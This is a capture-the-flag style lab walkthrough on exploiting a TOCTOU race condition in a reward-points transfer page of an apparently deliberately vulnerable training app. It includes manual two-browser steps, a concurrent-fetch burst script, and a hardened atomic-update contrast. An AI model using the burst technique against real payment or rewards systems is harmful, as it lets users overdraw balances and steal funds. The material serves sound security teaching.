Challenge 3 – Transfer
Transfer reward points between users.
Last updated
Transferring reward points is not something we do every day, but sending money is. Think of a rewards transfer as sending money: the basic functionality is identical.
Let us look at a sample transfer rewards flow:
There are three conditions that must be met for the transaction to succeed:
The transaction amount must be a positive number
The payer and payee cannot be the same user
The payer must have enough balance in their account
Let us see if the application is performing those checks. Go to the Sign up page and create two user accounts - Tom and Jerry
Transaction amount should be a positive number:
Go to the Transfer page
Put in a negative number in the amount field
Click on the Transfer button
Payer and payee can not be same:
Go to the Transfer page
Select the same user as payer and payee
Put in 10 as the amount
Click on the Transfer button
Payer should have enough balance in their account:
Go to the Transfer page
Select a payer and payee
Put in 300 as the amount
Click on the Transfer button
Let us visualize the happy path with the help of a sequence diagram:
Our aim is to bypass the business logic and send more reward points than we have. How can we do that? We need to get several transfers past the balance check before the application deducts the first one from the balance.
It’s time to slow down TimeGap Theory:
On your browser, navigate to the Settings page
Change the time delay to 5 seconds
Click on the Save button
Now, TimeGap Theory will wait 5 seconds before every database write operation, which widens the window between the balance check and the deduction.
Preparation phase
Open two browsers side by side (use a private/incognito window if you do not have two browsers)
On both the browsers:
Navigate to the Login page
Click on the first user button - this will fill the form with details of the user Tom
Navigate to the Transfer rewards page
If Tom's account has a balance of 100 points, enter a smaller amount, say 90, as the transfer value in both browsers. Each transfer on its own passes the balance check; together they exceed the balance
Select Tom as the payer
Select Jerry as the payee
Note down the balance of Jerry's account (which is displayed in parentheses)
Alright, the preparation is done. Here comes the exploitation phase.
Exploitation phase
Click on the Transfer button on the first browser
Go to the second browser as fast as you can
Click on the Transfer button on the second browser
There comes our third and final phase:
Post-exploitation phase
Wait for both browsers to complete the request
You can see that the transfer operation was successful in both browsers
Check the balance of user Jerry
Phew. You transferred more points from Tom's account than they had
If you check your scores, you will see that you have got 100 points for transfer challenge
Don't forget to change the delay back to 0 on the Settings page
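The following JavaScript is an added example, not code from TimeGap Theory: it models the transfer-rewards write path as check-then-write with a configurable wait between the balance check and the deduction (standing in for the Main wait you set above), fires two transfers at once against it, and contrasts it with a version that checks and debits in one atomic step. The account names, starting balances, delay and the function names transferVulnerable/transferHardened are constructed for the demo.

```javascript
// Added example (not TimeGap Theory's own code). Balances, account names and
// the delay are constructed for this demonstration.

const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

// Tom starts with 100 points, Jerry with 0, as in the manual walkthrough.
function makeLedger() {
  return { balances: { tom: 100, jerry: 0 } };
}

// The three business-logic checks every transfer must pass.
function validate(ledger, payer, payee, amount) {
  if (!(amount > 0)) return 'rejected: amount must be positive';
  if (payer === payee) return 'rejected: payer and payee cannot be the same';
  if (ledger.balances[payer] < amount) return 'rejected: insufficient balance';
  return null;
}

// Vulnerable write path: the balance is checked, then the request waits
// (the lab's database-write delay), then the deduction is written. Any
// request that arrives during the wait still sees the undeducted balance.
async function transferVulnerable(ledger, payer, payee, amount, delayMs) {
  const error = validate(ledger, payer, payee, amount); // time of check
  if (error) return error;
  await sleep(delayMs);                                 // the race window
  ledger.balances[payer] -= amount;                     // time of use
  ledger.balances[payee] += amount;
  return 'ok';
}

// Hardened write path: the check and the debit happen together with nothing
// in between, so a concurrent request sees the reduced balance. In SQL the
// equivalent is a conditional update such as
//   UPDATE accounts SET balance = balance - :amt
//   WHERE id = :payer AND balance >= :amt
// with zero affected rows treated as "insufficient balance".
async function transferHardened(ledger, payer, payee, amount, delayMs) {
  const error = validate(ledger, payer, payee, amount);
  if (error) return error;
  ledger.balances[payer] -= amount; // debited before any await
  await sleep(delayMs);             // slow downstream work no longer matters
  ledger.balances[payee] += amount;
  return 'ok';
}

// Fire `count` identical transfers concurrently, like clicking Transfer in
// two browsers inside the wait window, and report results and final balances.
async function race(transferFn, count, amount, delayMs) {
  const ledger = makeLedger();
  const results = await Promise.all(
    Array.from({ length: count }, () =>
      transferFn(ledger, 'tom', 'jerry', amount, delayMs)),
  );
  return { results, balances: ledger.balances };
}

// Demo: two 90-point transfers from a 100-point account.
race(transferVulnerable, 2, 90, 50).then((r) => console.log('vulnerable', r));
race(transferHardened, 2, 90, 50).then((r) => console.log('hardened', r));
```

Against the vulnerable path both transfers report ok and Tom ends at -80 with Jerry at 180, which is exactly what you saw in the two browsers; against the hardened path the second request is rejected and the balances stay at 10 and 90. The delay only makes the window easy to hit by hand; the defect is the gap between check and write, not its length.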
Let’s try and automate this.
First, we need a valid fetch request:
Open your browser (Chrome or Firefox)
Navigate to TimeGap Theory > Login
Click on the first user button. This will fill the user details for user Tom
Click on the login button
Navigate to TimeGap Theory > Webapp > User > Transfer rewards
Click on the first $10 from Tom to Jerry button. This will fill the form with some transfer details.
Open up dev tools by pressing F12 on the browser
On Windows, you can use Ctrl + Shift + I
On Mac, you can use Cmd + Shift + I
Click on the Transfer button
On the browser dev tools, click on the Network tab
Right click on the transfer-rewards.php request
Click on Copy > Copy as fetch
Paste that on the Console tab of the browser dev tools. You will get something like the following:
Again, don't worry if you see a slightly bigger request; the browser copies extra headers along with it. You can use that request as it is, or use the one shown above.
Now we have one request, and we need two.
Copy-paste the fetch request twice without pressing the Enter key in between, and separate the two with a comma so the Console evaluates them together: neither request is awaited, so both are dispatched before either response arrives. Let us do that
Before running this new command, we need to clear the slate. It involves two simple steps:
Ensure that there is no delay
Go to TimeGap Theory > Settings
Ensure that the Main wait is set to 0
Clear the current score
Go to TimeGap Theory > Score
Click on the Clear button
Alright, our slate is clear. With the delay at 0 the window is much narrower, but two requests dispatched in the same instant still both reach the balance check before either deduction is written. Let us execute the attack now:
Enter the combined fetch requests on the Console tab of browser dev tools
Click on the To field to see the rewards on each account
Now you see a negative value in Tom’s account
You also see corresponding change in Jerry’s account
Go to TimeGap Theory > Score
Check if you got points for completing the Transfer rewards challenge
What would be the business impact of such an attack? Depending on how the app is designed, there are several possibilities:
A user may start a huge number of parallel requests and transfer this boatload of money/points to an account controlled by them or by their friends/relatives
An attacker may work with friends to perform these transactions back and forth an unlimited number of times
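The automation above dispatches two requests by hand; the following JavaScript, an added example rather than code from TimeGap Theory or from this page, generalises it to any number of requests fired from the browser console with fetch, which is the pattern behind the "huge number of parallel requests" risk just described. The endpoint name transfer-rewards.php comes from this page; the POST field names from, to and amount are assumptions, so take the real ones from your Copy as fetch output and change buildRequest accordingly. recordingFetch is a constructed stand-in for fetch so the code can be dry-run offline.

```javascript
// Added example (not TimeGap Theory's own code). The field names in
// buildRequest are assumptions; copy the real ones from "Copy as fetch".

// Build the URL and fetch options for one transfer.
function buildRequest({ from, to, amount }) {
  return {
    url: 'transfer-rewards.php', // endpoint named on the page, relative to the webapp
    init: {
      method: 'POST',
      headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
      body: new URLSearchParams({ from, to, amount: String(amount) }).toString(),
    },
  };
}

// Dispatch `count` copies of the same transfer at once. Every fetch is
// started before any response is awaited; awaiting inside the loop would
// serialise the requests and leave no overlap for the race.
async function burst(transfer, count, fetchImpl = globalThis.fetch) {
  const { url, init } = buildRequest(transfer);
  const pending = Array.from({ length: count }, () => fetchImpl(url, init));
  const settled = await Promise.allSettled(pending);
  const ok = settled.filter((s) => s.status === 'fulfilled' && s.value.ok).length;
  return { sent: count, ok, failed: count - ok };
}

// Constructed stand-in for fetch: records each call and answers 200 OK,
// so the burst can be dry-run outside the browser.
function recordingFetch() {
  const calls = [];
  const impl = async (url, init) => {
    calls.push({ url, method: init.method, body: init.body });
    return { ok: true, status: 200 };
  };
  return { impl, calls };
}

// Dry run. In the browser console on the lab page, drop the third argument:
//   burst({ from: 'tom', to: 'jerry', amount: 90 }, 2).then(console.log)
const dry = recordingFetch();
burst({ from: 'tom', to: 'jerry', amount: 90 }, 2, dry.impl)
  .then((summary) => console.log(summary, dry.calls));
```

The summary only tells you how many requests the server answered with 2xx; as in the manual steps, confirm the effect by reading the balances on the Transfer page afterwards.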
Let us review what we did:
The transfer rewards page performs basic checks to prevent abuse
One of these checks looks at the payer's account to see if they have sufficient balance
You analyzed this behavior by trying to transfer more points than you had in balance
First, you slowed down the system and bypassed the sufficient-balance check with two browsers
Then you bypassed the same check without any delay, by firing two requests at once from the browser dev tools
You may have noticed during the automation phase that accessing the transfer-rewards page does not require authentication.
If you manually enter the transfer-rewards page URL on your browser, you will be able to access this page without logging in first
This made the TOCTOU exploitation slightly easier. No need to worry. In upcoming chapters, you will learn how to exploit TOCTOU issues in authenticated pages as well.
Now you know how TOCTOU security issues can affect money/points transfer pages